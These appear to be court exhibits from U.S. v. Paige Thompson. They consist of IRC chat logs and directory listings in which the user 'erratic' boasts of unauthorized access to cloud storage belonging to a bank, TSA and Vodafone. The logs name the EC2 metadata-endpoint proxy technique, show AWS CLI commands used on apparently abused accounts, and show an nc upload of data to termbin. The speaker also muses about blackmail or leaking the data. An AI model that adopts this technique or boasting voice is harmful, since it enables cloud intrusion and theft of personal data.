

IRC Chats from 1B52 - md127 ▸ md127-znc ▸ .znc ▸ moddata ▸ log ▸ erratic ▸ freenode ▸ rachel

| Name | Date modified | Type | Size |
|------|--------------|------|------|
| 2019-04-05.log | 4/5/2019 10:45 AM | Text Document | 5 KB |

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 450
Admitted_____

2019-04-05.log

```
 9  [18:23:26] <erratic> and it will take /at least/ 10GBit to DDoS me :) which will probably get blackholed
    but I should prob filter ssh and just setup a hidden service to it
    xD
10  [18:23:54] <erratic> then I don't have to expose anything to the internet that
    syn/acks
11  [18:25:20] <erratic> but yeah I should back this up, I have an unlimited supply of aws accounts but if
    anybody notices my instance they'll turn it
    off
12  [18:25:27] <erratic> lol
13  [18:25:48] <erratic> its a pretty cool one
    too
14  [18:26:46] <erratic> https://termbin.com/9s0u
15  [18:27:02] <erratic> Linux ip-172-31-2-255 4.15.0-1032-aws #34-Ubuntu SMP Thu Jan 17 19:40:56 UTC 2019
    aarch64 aarch64 aarch64 GNU/Linux
```

IRC Chats from 1B52 - md126 ▸ .znc ▸ moddata ▸ log ▸ erratic ▸ freenode ▸ #netcrave

der

| Name | Date modified | Type | Size |
|------|---------------|------|------|
| 2019-04-05.log | 4/5/2019 11:20 AM | Text Document | 1 KB |
| 2019-04-11.log | 4/11/2019 3:56 PM | Text Document | 1 KB |
| 2019-04-12.log | 4/12/2019 11:41 AM | Text Document | 3 KB |
| 2019-04-14.log | 4/14/2019 1:21 AM | Text Document | 1 KB |
| 2019-04-15.log | 4/15/2019 2:02 AM | Text Document | 8 KB |
| 2019-04-16.log | 4/16/2019 5:22 AM | Text Document | 7 KB |
| 2019-04-18.log | 4/18/2019 5:04 AM | Text Document | 3 KB |
| 2019-04-19.log | 4/19/2019 3:56 PM | Text Document | 10 KB |
| 2019-04-21.log | 4/21/2019 4:36 PM | Text Document | 2 KB |
| 2019-04-22.log | 4/22/2019 4:52 PM | Text Document | 10 KB |
| 2019-04-23.log | 4/23/2019 8:05 AM | Text Document | 1 KB |
| 2019-04-24.log | 4/24/2019 3:06 PM | Text Document | 1 KB |
| 2019-04-25.log | 4/25/2019 10:52 AM | Text Document | 10 KB |
| 2019-04-26.log | 4/26/2019 4:59 PM | Text Document | 5 KB |

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 451
Admitted_____

2019-04-16.log

37  [08:44:37] <erratic> the day is definitely coming
38  [08:49:34] <erratic> these fucking kubelets... https://gist.github.com/paigeadelethompson/e86c6fa7683abfee58b332513282613e
39  [08:50:43] <erratic> Im getting closer to understanding how this works, they did the IAM profile right but the thing is .... the
    VPC is still exposed dude ...
40  [08:50:47] <erratic> thats not good
41  [08:52:04] <erratic> and what pisses me off even more instead of figuring out how the fucking shit happened in the first place
    and fixing that they just delete the IAM profile or ... change it to readonly
42  [08:53:38] <erratic> like I am 99% sure IAM audits just enough by default that you should be able to find the assume role and put
    2 and 2 together
43  [08:55:04] <erratic> you know what pisses me off even more than that though, is one of these is a financial institution and that
    one has ALOT of (evidently) unaudited S3 read access.
44  [08:56:43] <erratic> a very well known financial institution ... cough cough yeah I'm ready to put that all behind me now, what
    was I talking about again? oh right, an army of pseudo solaris machines turned rogue botnet to take over the world
45  [08:59:00] <erratic> yeah Im not trying to be part of no equifax scale disaster
46  [08:59:31] <erratic> I will say I am proud of myself
47  [08:59:39] <erratic> for never owning a credit card

IRC Chats from 1B52 - md126 ▸ .znc ▸ moddata ▸ log ▸ erratic ▸ freenode ▸ #netcrave

ler

| Name | Date modified | Type | Size |
|---|---|---|---|
| 2019-04-05.log | 4/5/2019 11:20 AM | Text Document | 1 KB |
| 2019-04-11.log | 4/11/2019 3:56 PM | Text Document | 1 KB |
| 2019-04-12.log | 4/12/2019 11:41 AM | Text Document | 3 KB |
| 2019-04-14.log | 4/14/2019 1:21 AM | Text Document | 1 KB |
| 2019-04-15.log | 4/15/2019 2:02 AM | Text Document | 8 KB |
| 2019-04-16.log | 4/16/2019 5:22 AM | Text Document | 7 KB |
| 2019-04-18.log | 4/18/2019 5:04 AM | Text Document | 3 KB |
| 2019-04-19.log | 4/19/2019 3:56 PM | Text Document | 10 KB |
| 2019-04-21.log | 4/21/2019 4:36 PM | Text Document | 2 KB |
| 2019-04-22.log | 4/22/2019 4:52 PM | Text Document | 10 KB |

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 452
Admitted_____

2019-04-19.log ☒

```
4   [05:58:48] <erratic> thats what I want, a spacebag iv
5   [05:59:55] <erratic> neoice: can I come to your next lan party? I'll bring space bags
6   [07:43:54] <erratic> the scanner takes about 20 hours total
7   [07:44:31] <erratic> pretty epic
8   [07:44:44] <erratic> 39 * 36M requests
```

IRC Chats from 1B52 - md126  ▸  .znc  ▸  moddata  ▸  log  ▸  erratic  ▸  freenode  ▸  vyzo

| Name | Date modified | Type |
|------|---------------|------|
| 2019-04-21.log | 4/21/2019 4:33 PM | Text Document |
| 2019-04-22.log | 4/22/2019 1:13 AM | Text Document |
| 2019-06-05.log | 6/5/2019 4:43 AM | Text Document |
| 2019-07-28.log | 7/28/2019 4:02 AM | Text Document |

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 453
Admitted_____

2019-04-21.log

```
 1   [22:36:38] <erratic> https://gist.github.com/paigeadelethompson/9edf57dc3b10f72db5c8dc8e6ce16b9b
 2   [22:36:48] <erratic> g1bs0n: 0wn3d
 3   [23:17:17] <erratic> I like how my roommate straight away suggested "blackmail those motherfuckers!"
 4   [23:17:49] <erratic> which I"m pretty sure I would summarily be thrown under the bus
 5   [23:18:05] <erratic> you dont have read access to everything
 6   [23:18:22] <erratic> but there is a substantial amount
 7   [23:19:04] <erratic> but you gotta give it to her, she has the right attitude
 8   [23:19:37] <erratic> but it just seems like such a terrible idea
 9   [23:21:30] <erratic> you know what else I got
10   [23:22:11] <erratic> not nearly as good as that but v0daf0ne
11   [23:22:21] <erratic> yep
12   [23:23:26] <erratic> by virtue of their payment gateway
13   [23:32:42] <erratic> https://gist.github.com/paigeadelethompson/1d046e22a54995ebf82040d9279317cc
14   [23:32:48] <erratic> yes I Have their fucking certs
15   [23:33:05] <erratic> I got a lot of shit.
```

der

| Name | Date modified | Type | Size |
|------|---------------|------|------|
| 2019-04-24.log | 4/24/2019 3:06 PM | Text Document | 1 KB |
| 2019-04-25.log | 4/25/2019 10:52 AM | Text Document | 10 KB |
| 2019-04-26.log | 4/26/2019 4:59 PM | Text Document | 5 KB |
| 2019-04-27.log | 4/27/2019 8:43 AM | Text Document | 2 KB |
| 2019-04-28.log | 4/27/2019 10:15 PM | Text Document | 1 KB |
| 2019-04-29.log | 4/29/2019 4:57 PM | Text Document | 20 KB |
| 2019-04-30.log | 4/30/2019 3:28 PM | Text Document | 11 KB |
| 2019-05-01.log | 5/1/2019 4:42 PM | Text Document | 40 KB |
| 2019-05-02.log | 5/2/2019 1:03 PM | Text Document | 3 KB |
| 2019-05-04.log | 5/4/2019 2:31 PM | Text Document | 1 KB |
| 2019-05-05.log | 5/5/2019 4:36 AM | Text Document | 1 KB |
| 2019-05-06.log | 5/6/2019 2:47 PM | Text Document | 19 KB |
| 2019-05-07.log | 5/7/2019 4:25 PM | Text Document | 2 KB |
| 2019-05-08.log | 5/8/2019 1:15 PM | Text Document | 2 KB |
| 2019-05-09.log | 5/9/2019 10:42 AM | Text Document | 9 KB |
| 2019-05-10.log | 5/10/2019 10:13 AM | Text Document | 1 KB |
| 2019-05-11.log | 5/11/2019 3:21 PM | Text Document | 1 KB |

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 454
Admitted_____

2019-05-06.log

14  [05:37:14] <erratic> I fucking messaged like 6 people today trying to find a vet that would accept cryptocurrency, and I made a very generous offer
15  [05:37:31] <erratic> just to come over and give me an assessment
16  [05:37:49] <erratic> really goes to show how full of shit people are and how much they really don't give a fuck about animals
17  [05:38:21] <erratic> I understand you have a life, kids, etc
18  [05:38:49] <erratic> but six fucking people and not even a "very sorry I don't think I can but good luck and I hope your pet gets through"
19  [05:39:40] <erratic> Im just saying maybe we could do with like 1 or 2 actual vet clinics here in seattle instead of the free enterprise that its become
20  [05:40:05] <erratic> pisses me off
21  [05:40:29] <erratic> Javantea: it pisses me off so bad, it makes me want to ... leak these TSA s3 buckets I got
22  [05:40:53] <erratic> shit nigga, nah I aint trying to go out like that
23  [05:41:06] <erratic> we gettin there tho

454-002

| Name | Date modified | Type | Size |
|---|---|---|---|
| 2019-06-23.091802-0700PDT.html | 6/23/2019 8:46 AM | Firefox HTML Doc... | 40 KB |
| 2019-06-23.152301-0700PDT.html | 6/23/2019 6:03 PM | Firefox HTML Doc... | 216 KB |
| 2019-06-23.190022-0700PDT.html | 6/23/2019 7:27 PM | Firefox HTML Doc... | 4 KB |
| 2019-06-23.202750-0700PDT.html | 6/24/2019 8:00 AM | Firefox HTML Doc... | 360 KB |
| 2019-06-24.090019-0700PDT.html | 6/24/2019 9:25 AM | Firefox HTML Doc... | 8 KB |
| 2019-06-24.102509-0700PDT.html | 6/25/2019 5:49 AM | Firefox HTML Doc... | 1,340 KB |
| 2019-06-25.064922-0700PDT.html | 6/25/2019 6:03 AM | Firefox HTML Doc... | 4 KB |
| 2019-06-25.065150-0700PDT.html | 6/25/2019 6:11 AM | Firefox HTML Doc... | 4 KB |
| 2019-06-25.071059-0700PDT.html | 6/25/2019 7:59 AM | Firefox HTML Doc... | 180 KB |
| 2019-06-25.085954-0700PDT.html | 6/25/2019 8:38 AM | Firefox HTML Doc... | 144 KB |
| 2019-06-25.093810-0700PDT.html | 6/25/2019 1:19 PM | Firefox HTML Doc... | 56 KB |
| 2019-06-25.141956-0700PDT.html | 6/25/2019 2:17 PM | Firefox HTML Doc... | 16 KB |
| 2019-06-25.151738-0700PDT.html | 6/25/2019 3:22 PM | Firefox HTML Doc... | 4 KB |
| 2019-06-25.162214-0700PDT.html | 6/25/2019 5:30 PM | Firefox HTML Doc... | 44 KB |
| 2019-06-25.183051-0700PDT.html | 6/25/2019 6:17 PM | Firefox HTML Doc... | 8 KB |
| 2019-06-26.095308-0700PDT.html | 6/26/2019 1:18 PM | Firefox HTML Doc... | 200 KB |
| 2019-06-26.141806-0700PDT.html | 6/26/2019 4:41 PM | Firefox HTML Doc... | 40 KB |
| 2019-06-26.174106-0700PDT.html | 6/27/2019 8:51 AM | Firefox HTML Doc... | 1,276 KB |
| 2019-06-27.095143-0700PDT.html | 6/27/2019 10:59 AM | Firefox HTML Doc... | 12 KB |
| 2019-06-27.115908-0700PDT.html | 6/27/2019 2:46 PM | Firefox HTML Doc... | 4 KB |
| 2019-06-27.154625-0700PDT.html | 6/27/2019 8:18 PM | Firefox HTML Doc... | 4 KB |
| 2019-06-27.211824-0700PDT.html | 6/27/2019 10:06 PM | Firefox HTML Doc... | 4 KB |
| 2019-06-27.230610-0700PDT.html | 6/28/2019 12:19 PM | Firefox HTML Doc... | 3,516 KB |
| 2019-06-28.131910-0700PDT.html | 6/28/2019 4:04 PM | Firefox HTML Doc... | 40 KB |
| 2019-06-28.170422-0700PDT.html | 6/28/2019 6:24 PM | Firefox HTML Doc... | 4 KB |
| 2019-06-28.192444-0700PDT.html | 6/28/2019 10:30 PM | Firefox HTML Doc... | 44 KB |
| 2019-06-28.233045-0700PDT.html | 6/29/2019 6:25 PM | Firefox HTML Doc... | 4 KB |
| 2019-06-29.192532-0700PDT.html | 6/29/2019 8:23 PM | Firefox HTML Doc... | 40 KB |
| 2019-06-29.212341-0700PDT.html | 6/29/2019 10:00 PM | Firefox HTML Doc... | 252 KB |
| 2019-06-30.131058-0700PDT.html | 6/30/2019 1:13 PM | Firefox HTML Doc... | 4 KB |
| 2019-06-30.142755-0700PDT.html | 6/30/2019 4:19 PM | Firefox HTML Doc... | 208 KB |
| 2019-06-30.171859-0700PDT.html | 6/30/2019 4:29 PM | Firefox HTML Doc... | 4 KB |
| 2019-06-30.172918-0700PDT.html | 6/30/2019 4:40 PM | Firefox HTML Doc... | 4 KB |
| 2019-06-30.174002-0700PDT.html | 7/1/2019 8:49 AM | Firefox HTML Doc... | 360 KB |
| 2019-07-01.094952-0700PDT.html | 7/1/2019 10:46 AM | Firefox HTML Doc... | 4 KB |
| 2019-07-01.114630-0700PDT.html | 7/1/2019 2:25 PM | Firefox HTML Doc... | 228 KB |
| 2019-07-01.152540-0700PDT.html | 7/1/2019 4:53 PM | Firefox HTML Doc... | 16 KB |
| 2019-07-01.175356-0700PDT.html | 7/1/2019 6:01 PM | Firefox HTML Doc... | 100 KB |
| 2019-07-02.193811-0700PDT.html | 7/3/2019 9:28 AM | Firefox HTML Doc... | 2,256 KB |
| 2019-07-03.225307-0700PDT.html | 7/4/2019 12:24 PM | Firefox HTML Doc... | 244 KB |
| 2019-07-04.132409-0700PDT.html | 7/4/2019 3:25 PM | Firefox HTML Doc... | 384 KB |
| 2019-07-04.233138-0700PDT.html | 7/5/2019 12:48 AM | Firefox HTML Doc... | 4 KB |
| 2019-07-05.231014-0700PDT.html | 7/5/2019 10:12 PM | Firefox HTML Doc... | 4 KB |
| 2019-07-13.222733-0700PDT.html | 7/13/2019 9:27 AM | Firefox HTML Doc... | 4 KB |

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 456
Admitted_____



IRC Chats from 1B2/.purple/.purple/logs/irc/erratic@localhost/%23efnetnews.chat/2019-06-25.093810-0700PDT.html   ▽ C   Q Search

Most Visited   Getting Started

(10:42:38 AM) **erraticb:** aws ec2 run-instances --region us-east-1 --instance-type r5.large --count 100 --image-id ami-acc690d3 --security-group-ids sg-054ce08dc77372f9f --associate-public-ip-address --instance-initiated-shutdown-behavior terminate --key-name default

(10:42:43 AM) **erraticb:** An error occurred (InstanceLimitExceeded) when calling the RunInstances operation: Your quota allows for 20 more running instance(s). You requested at least 100

(10:42:49 AM) **sapod left the room (quit: Quit: The Deadly Sins: Só ele é assim   [www.t7ds.com.br]).**

(10:42:49 AM) **qp is now known as sapod**

(10:42:49 AM) **sapod:** GOT EMMMMMMMM

(10:42:50 AM) **erraticb:** doing doing da doing doing

(10:43:26 AM) **erraticb:** stil easily like 200gbps not too bad

(10:43:29 AM) **erraticb:** just had to check

(10:43:34 AM) **cutie420:** ill check it out for erraticb

(10:43:40 AM) **dma:** hi

(10:46:40 AM) **erraticb:** sup dma

456-002

IRC Chats from 1B2 ▸ .purple ▸ .purple ▸ logs ▸ irc ▸ erratic@localhost ▸ #efnetnews.chat

| Name | Date modified | Type | Size |
|------|---------------|------|------|
| 2019-06-23.091802-0700PDT.html | 6/23/2019 8:46 AM | Firefox HTML Doc… | 40 KB |
| 2019-06-23.152301-0700PDT.html | 6/23/2019 6:03 PM | Firefox HTML Doc… | 216 KB |
| 2019-06-23.190022-0700PDT.html | 6/23/2019 7:27 PM | Firefox HTML Doc… | 4 KB |
| 2019-06-23.202750-0700PDT.html | 6/24/2019 8:00 AM | Firefox HTML Doc… | 360 KB |
| 2019-06-24.090019-0700PDT.html | 6/24/2019 9:25 AM | Firefox HTML Doc… | 8 KB |
| 2019-06-24.102509-0700PDT.html | 6/25/2019 5:49 AM | Firefox HTML Doc… | 1,340 KB |
| 2019-06-25.064922-0700PDT.html | 6/25/2019 6:03 AM | Firefox HTML Doc… | 4 KB |
| 2019-06-25.065150-0700PDT.html | 6/25/2019 6:11 AM | Firefox HTML Doc… | 4 KB |
| 2019-06-25.071059-0700PDT.html | 6/25/2019 7:59 AM | Firefox HTML Doc… | 180 KB |
| 2019-06-25.085954-0700PDT.html | 6/25/2019 8:38 AM | Firefox HTML Doc… | 144 KB |
| 2019-06-25.093810-0700PDT.html | 6/25/2019 1:19 PM | Firefox HTML Doc… | 56 KB |
| 2019-06-25.141956-0700PDT.html | 6/25/2019 2:17 PM | Firefox HTML Doc… | 16 KB |
| 2019-06-25.151738-0700PDT.html | 6/25/2019 3:22 PM | Firefox HTML Doc… | 4 KB |
| 2019-06-25.162214-0700PDT.html | 6/25/2019 5:30 PM | Firefox HTML Doc… | 44 KB |



IRC Chats from 1B2/.purple/.purple/logs/irc/erratic@localhost/%23efnetnews.chat/2019-06-25.085954-0700PDT.html ▽ C ⟋ Q Search

Most Visited ⬚ Getting Started

(09:12:59 AM) **erraticb:** aws ec2 authorize-security-group-ingress --group-id sg-0730eb292c07940f2 --protocol tcp --port 22 --cidr 0.0.0.0/0 --region us-west-2
(09:13:05 AM) **erraticb:** west side for life
(09:15:02 AM) **erraticb:** bitch, checkin my stock
(09:15:13 AM) **erraticb:** lol

| Name | Date modified | Type | Size |
|---|---|---|---|
| 2019-06-23.091802-0700PDT.html | 6/23/2019 8:46 AM | Firefox HTML Doc... | 4 KB |
| 2019-06-23.152301-0700PDT.html | 6/23/2019 6:03 PM | Firefox HTML Doc... | 96 KB |
| 2019-06-23.190051-0700PDT.html | 6/23/2019 7:27 PM | Firefox HTML Doc... | 8 KB |
| 2019-06-23.202750-0700PDT.html | 6/24/2019 8:00 AM | Firefox HTML Doc... | 264 KB |
| 2019-06-24.090019-0700PDT.html | 6/24/2019 9:25 AM | Firefox HTML Doc... | 24 KB |
| 2019-06-24.102508-0700PDT.html | 6/25/2019 5:49 AM | Firefox HTML Doc... | 628 KB |
| 2019-06-25.064922-0700PDT.html | 6/25/2019 6:03 AM | Firefox HTML Doc... | 4 KB |
| 2019-06-25.065219-0700PDT.html | 6/25/2019 6:11 AM | Firefox HTML Doc... | 12 KB |
| 2019-06-25.071058-0700PDT.html | 6/25/2019 7:59 AM | Firefox HTML Doc... | 40 KB |
| 2019-06-25.085954-0700PDT.html | 6/25/2019 8:38 AM | Firefox HTML Doc... | 8 KB |
| 2019-06-25.093809-0700PDT.html | 6/25/2019 1:19 PM | Firefox HTML Doc... | 68 KB |
| 2019-06-25.141955-0700PDT.html | 6/25/2019 2:17 PM | Firefox HTML Doc... | 64 KB |
| 2019-06-25.151738-0700PDT.html | 6/25/2019 3:22 PM | Firefox HTML Doc... | 36 KB |
| 2019-06-25.162214-0700PDT.html | 6/25/2019 5:30 PM | Firefox HTML Doc... | 32 KB |
| 2019-06-25.183050-0700PDT.html | 6/25/2019 6:17 PM | Firefox HTML Doc... | 16 KB |
| 2019-06-26.095308-0700PDT.html | 6/26/2019 1:18 PM | Firefox HTML Doc... | 168 KB |
| 2019-06-26.141805-0700PDT.html | 6/26/2019 4:41 PM | Firefox HTML Doc... | 52 KB |
| 2019-06-26.174106-0700PDT.html | 6/27/2019 8:51 AM | Firefox HTML Doc... | 120 KB |
| 2019-06-27.095143-0700PDT.html | 6/27/2019 10:59 AM | Firefox HTML Doc... | 356 KB |
| 2019-06-27.115908-0700PDT.html | 6/27/2019 2:46 PM | Firefox HTML Doc... | 8 KB |
| 2019-06-27.154625-0700PDT.html | 6/27/2019 8:18 PM | Firefox HTML Doc... | 16 KB |
| 2019-06-27.211824-0700PDT.html | 6/27/2019 10:06 PM | Firefox HTML Doc... | 8 KB |
| 2019-06-27.230610-0700PDT.html | 6/28/2019 12:19 PM | Firefox HTML Doc... | 392 KB |
| 2019-06-28.131909-0700PDT.html | 6/28/2019 4:04 PM | Firefox HTML Doc... | 20 KB |
| 2019-06-28.170422-0700PDT.html | 6/28/2019 6:24 PM | Firefox HTML Doc... | 4 KB |
| 2019-06-28.192444-0700PDT.html | 6/28/2019 10:30 PM | Firefox HTML Doc... | 772 KB |
| 2019-06-28.233045-0700PDT.html | 6/29/2019 6:25 PM | Firefox HTML Doc... | 16 KB |
| 2019-06-29.192530-0700PDT.html | 6/29/2019 8:23 PM | Firefox HTML Doc... | 44 KB |
| 2019-06-29.212339-0700PDT.html | 6/29/2019 10:11 PM | Firefox HTML Doc... | 136 KB |
| 2019-06-30.131057-0700PDT.html | 6/30/2019 1:13 PM | Firefox HTML Doc... | 28 KB |
| 2019-06-30.142755-0700PDT.html | 6/30/2019 4:19 PM | Firefox HTML Doc... | 540 KB |
| 2019-06-30.171859-0700PDT.html | 6/30/2019 4:29 PM | Firefox HTML Doc... | 8 KB |
| 2019-06-30.172918-0700PDT.html | 6/30/2019 4:40 PM | Firefox HTML Doc... | 16 KB |
| 2019-06-30.174002-0700PDT.html | 7/1/2019 8:49 AM | Firefox HTML Doc... | 516 KB |
| 2019-07-01.094952-0700PDT.html | 7/1/2019 10:46 AM | Firefox HTML Doc... | 8 KB |
| 2019-07-01.114630-0700PDT.html | 7/1/2019 2:25 PM | Firefox HTML Doc... | 88 KB |
| 2019-07-01.152540-0700PDT.html | 7/1/2019 4:53 PM | Firefox HTML Doc... | 12 KB |
| 2019-07-01.175355-0700PDT.html | 7/1/2019 6:01 PM | Firefox HTML Doc... | 52 KB |
| 2019-07-02.193811-0700PDT.html | 7/3/2019 9:28 PM | Firefox HTML Doc... | 5,008 KB |
| 2019-07-03.225307-0700PDT.html | 7/4/2019 12:24 PM | Firefox HTML Doc... | 1,488 KB |
| 2019-07-04.132409-0700PDT.html | 7/4/2019 3:25 PM | Firefox HTML Doc... | 152 KB |
| 2019-07-04.233138-0700PDT.html | 7/5/2019 1:07 AM | Firefox HTML Doc... | 208 KB |
| 2019-07-05.231013-0700PDT.html | 7/5/2019 10:12 PM | Firefox HTML Doc... | 4 KB |
| 2019-07-13.222733-0700PDT.html | 7/13/2019 9:30 PM | Firefox HTML Doc... | 4 KB |

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 457
Admitted_____



(04:17:22 PM) **kongfuzi:** using fog for the cloud instrumentation

(04:18:31 PM) **erotic:** lol yeah dude like my idea of devops is write a bash script, base64 blob includes, use ec2 user-data (http://169.254.169.254/latest/meta-data)

(04:19:14 PM) **erotic:** which is not great, if you are putting passwords and shit in there, and you'd be surprised how many people do

(04:19:28 PM) **erotic:** Ive got a huge collection of leaked user-data blobs

(04:19:48 PM) **erotic:** people setting up proxies on ec2 and not filtering access to 169.254.169.254

(04:20:04 PM) **Mahjong left the room (quit: Quit: something broke).**

(04:20:06 PM) **erotic:** also IAM instance profiles

(04:22:54 PM) **erotic:** lol my friend is getting in her car, freakin bmw m5 (brrrrring!)

(04:23:20 PM) **erotic:** I kinda want an m2

| Name | Date modified | Type | Size |
|------|---------------|------|------|
| 2019-06-23.091802-0700PDT.html | 6/23/2019 8:46 AM | HTML File | 4 KB |
| 2019-06-23.152301-0700PDT.html | 6/23/2019 6:03 PM | HTML File | 4 KB |
| 2019-06-23.190121-0700PDT.html | 6/23/2019 7:27 PM | HTML File | 4 KB |
| 2019-06-23.202750-0700PDT.html | 6/24/2019 8:00 AM | HTML File | 4 KB |
| 2019-06-24.090019-0700PDT.html | 6/24/2019 9:25 AM | HTML File | 4 KB |
| 2019-06-24.102509-0700PDT.html | 6/25/2019 5:49 AM | HTML File | 4 KB |
| 2019-06-25.064922-0700PDT.html | 6/25/2019 6:03 AM | HTML File | 4 KB |
| 2019-06-25.065249-0700PDT.html | 6/25/2019 6:11 AM | HTML File | 4 KB |
| 2019-06-25.071058-0700PDT.html | 6/25/2019 7:59 AM | HTML File | 4 KB |
| 2019-06-25.085954-0700PDT.html | 6/25/2019 8:38 AM | HTML File | 4 KB |
| 2019-06-25.093810-0700PDT.html | 6/25/2019 1:19 PM | HTML File | 4 KB |
| 2019-06-25.141955-0700PDT.html | 6/25/2019 2:17 PM | HTML File | 4 KB |
| 2019-06-25.151738-0700PDT.html | 6/25/2019 3:22 PM | HTML File | 4 KB |
| 2019-06-25.162214-0700PDT.html | 6/25/2019 5:30 PM | HTML File | 4 KB |
| 2019-06-25.183051-0700PDT.html | 6/25/2019 6:17 PM | HTML File | 4 KB |
| 2019-06-26.095308-0700PDT.html | 6/26/2019 1:18 PM | HTML File | 4 KB |
| 2019-06-26.141805-0700PDT.html | 6/26/2019 4:41 PM | HTML File | 4 KB |
| 2019-06-26.174106-0700PDT.html | 6/27/2019 8:51 AM | HTML File | 4 KB |
| 2019-06-27.095143-0700PDT.html | 6/27/2019 10:59 AM | HTML File | 4 KB |
| 2019-06-27.115908-0700PDT.html | 6/27/2019 2:46 PM | HTML File | 4 KB |
| 2019-06-27.154625-0700PDT.html | 6/27/2019 8:18 PM | HTML File | 4 KB |
| 2019-06-27.211824-0700PDT.html | 6/27/2019 10:06 PM | HTML File | 4 KB |
| 2019-06-27.230610-0700PDT.html | 6/28/2019 12:19 PM | HTML File | 4 KB |
| 2019-06-28.131910-0700PDT.html | 6/28/2019 4:04 PM | HTML File | 4 KB |
| 2019-06-28.170422-0700PDT.html | 6/28/2019 6:24 PM | HTML File | 4 KB |
| 2019-06-28.192444-0700PDT.html | 6/28/2019 10:30 PM | HTML File | 4 KB |
| 2019-06-28.233045-0700PDT.html | 6/29/2019 6:25 PM | HTML File | 4 KB |
| 2019-06-29.192531-0700PDT.html | 6/29/2019 8:23 PM | HTML File | 4 KB |
| 2019-06-30.131057-0700PDT.html | 6/30/2019 12:56 PM | HTML File | 4 KB |
| 2019-06-30.142755-0700PDT.html | 6/30/2019 4:19 PM | HTML File | 4 KB |
| 2019-06-30.171859-0700PDT.html | 6/30/2019 4:29 PM | HTML File | 4 KB |
| 2019-06-30.172918-0700PDT.html | 6/30/2019 4:40 PM | HTML File | 4 KB |
| 2019-06-30.174002-0700PDT.html | 7/1/2019 8:49 AM | HTML File | 4 KB |
| 2019-07-01.094952-0700PDT.html | 7/1/2019 10:46 AM | HTML File | 4 KB |
| 2019-07-01.114630-0700PDT.html | 7/1/2019 2:25 PM | HTML File | 4 KB |
| 2019-07-01.152540-0700PDT.html | 7/1/2019 4:53 PM | HTML File | 4 KB |
| 2019-07-01.175356-0700PDT.html | 7/1/2019 6:01 PM | HTML File | 4 KB |
| 2019-07-02.193811-0700PDT.html | 7/3/2019 9:09 PM | HTML File | 20 KB |
| 2019-07-03.225307-0700PDT.html | 7/4/2019 12:24 PM | HTML File | 12 KB |
| 2019-07-04.132409-0700PDT.html | 7/4/2019 3:25 PM | HTML File | 4 KB |

(09:14:11 PM) **netcrave**: <paigeadele> I know I can do like os.lsdir() in my

(09:22:33 PM) **netcrave**: <paigeadele> https://docs.databricks.com/spark-latest-dataframes-datasets-introduction-to-dataframes-python.html

(09:25:06 PM) **netcrave**: <paigeadele> https://stackoverflow.com/questions/32742004/create-spark-dataframe-can-not-infer-schema-for-type-type-float

(09:26:09 PM) **netcrave**: <paigeadele> ``` df = spark.read.format(file_type) \ .option("inferSchema", infer_schema) \ .option("header", first_row_is_header) \ .option("sep", delimiter) \ .load(file_location)``` I want to use this factory pattern I think but instead

(09:26:23 PM) **netcrave**: <paigeadele> maybe theres a way to merge df

(09:26:35 PM) **netcrave**: <paigeadele> sec

(09:27:39 PM) **netcrave**: <paigeadele> https://forums.databricks.com/questions/8180/how-to-merge-two-data-frames-column-wise-in-apache.html

(09:27:58 PM) **netcrave**: <paigeadele> thats like a col wise merge

(09:28:46 PM) **netcrave**: <paigeadele> `df1 = df1.withColumn("id", monotonically_increasing_id())`

(09:29:04 PM) **netcrave**: <paigeadele> `df3 = df2.join(df1, "id", "outer").drop("id")`

(09:29:22 PM) **netcrave**: <paigeadele> thats not really wahat I want more like a union

(09:31:36 PM) **netcrave**: <paigeadele> ```

(09:31:41 PM) **netcrave**: <paigeadele> ``` "Union can only be performed on tables with the compatible column types.

struct<InfluxSrv:struct<environment:array<string>,expose:array<string>,image:string,ports:array<string>>,cad visor:struct<command:string,image:string,links:array<string>,ports:array<string>,volumes:array<string>>,grafa na:struct<environment:array<string>,image:string,links:array<string>,ports:array<string>>> <>

(09:31:41 PM) **netcrave**:

struct<backup_daily:struct<command:string,environment:struct<AWS_ACCESS_KEY_ID:string,AWS_DEFA ULT_REGION:string,AWS_SECRET_ACCESS_KEY:string,S3_BUCKET:string,S3_PATH:string>,image:str ing,links:array<string>>,backup_hourly:struct<command:string,environment:struct<AWS_ACCESS_KEY_ID: string,AWS_DEFAULT_REGION:string,AWS_SECRET_ACCESS_KEY:string,S3_BUCKET:string,S3_PAT H:string>,image:string,links:array<string>>,dbvol_master

(09:31:42 PM) **netcrave**:

:struct<command:string,image:string,mem_limit:string,volumes:array<string>>,mysql:struct<cpu_shares:bigint

,environment:struct<MYSQL_PASS:string,MYSQL_USER:string,ON_CREATE_DB:string,REPLICATION_ MASTER:boolean,REPLICATION_PASS:string>,image:string,mem_limit:string,ports:array<string>,restart:str ing,volumes_from:array<string>>,mysql_slave:struct<cpu_shares:bigint,deployment_strategy:string,environme nt:struct<MYSQL_PASS:s

(09:31:42 PM) **netcrave**:

tring,MYSQL_USER:string,ON_CREATE_DB:string,REPLICATION_PASS:string,REPLICATION_SLAVE: boolean>,image:string,links:array<string>,mem_limit:string,ports:array<string>,restart:string,target_num_conta iners:bigint>,tutum-cron:struct<autorestart:string,cpu_shares:bigint,environment:struct<BACKUP_DAILY_CRON_SCHEDULE:st ring,BACKUP_HOURLY_CRON_SCHEDULE:string>,image:string,links:array<string>,mem_limit:string,role s:array<string

(09:31:42 PM) **netcrave**: >>> at the 9th column of the second table;;\n&apos;Union\n:-Relation[__v#7987L,_id#7988,author#7989,branch#7990,description#7991,images#7992,path#7993,profileLin k#7994,projectName#7995,stackfile#7996,stars#7997L,tags#7998,title#7999,token#8000,user#8001] json\n+-

(09:31:43 PM) **netcrave**:

Relation[__v#8023L,_id#8024,author#8025,branch#8026,description#8027,images#8028,path#8029,profileLin k#8030,projectName#8031,stackfile#8032,stars#8033L,tags#8034,title#8035,token#8036,user#8037] json\n"```

(09:31:56 PM) **netcrave**: <paigeadele> tahts crazy

(09:33:24 PM) **netcrave**: <paigeadele> ` cat * | jq &apos;.[] | ._id&apos; | nc termbin.com 9999`

(09:33:30 PM) **netcrave**: <paigeadele> https://termbin.com/oeix

